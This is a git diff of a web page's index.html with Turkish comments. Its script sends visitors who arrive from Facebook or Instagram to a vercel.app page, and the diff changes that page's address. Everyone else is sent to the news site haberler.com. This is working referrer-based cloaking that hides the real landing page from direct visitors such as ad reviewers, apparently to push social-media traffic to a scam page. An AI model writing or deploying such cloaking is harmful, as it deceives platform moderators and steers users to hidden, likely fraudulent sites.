--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
         // Eğer sayfa referrer (gelen referans) header'ında sosyal medya alan adları varsa
         if (document.referrer.includes("facebook.com") || document.referrer.includes("instagram.com")) {
             // Sosyal medya paylaşımlarından gelen tıklamalarda farklı bir siteye yönlendir
-            window.location.href = "https://ocakdatigimlaribasladisimdibasla.vercel.app/";
+            window.location.href = "https://grntcolk.vercel.app/";
         } else {
             // Doğrudan sayfa açılması durumunda farklı bir siteye yönlendir
             window.location.href = "https://www.haberler.com/";
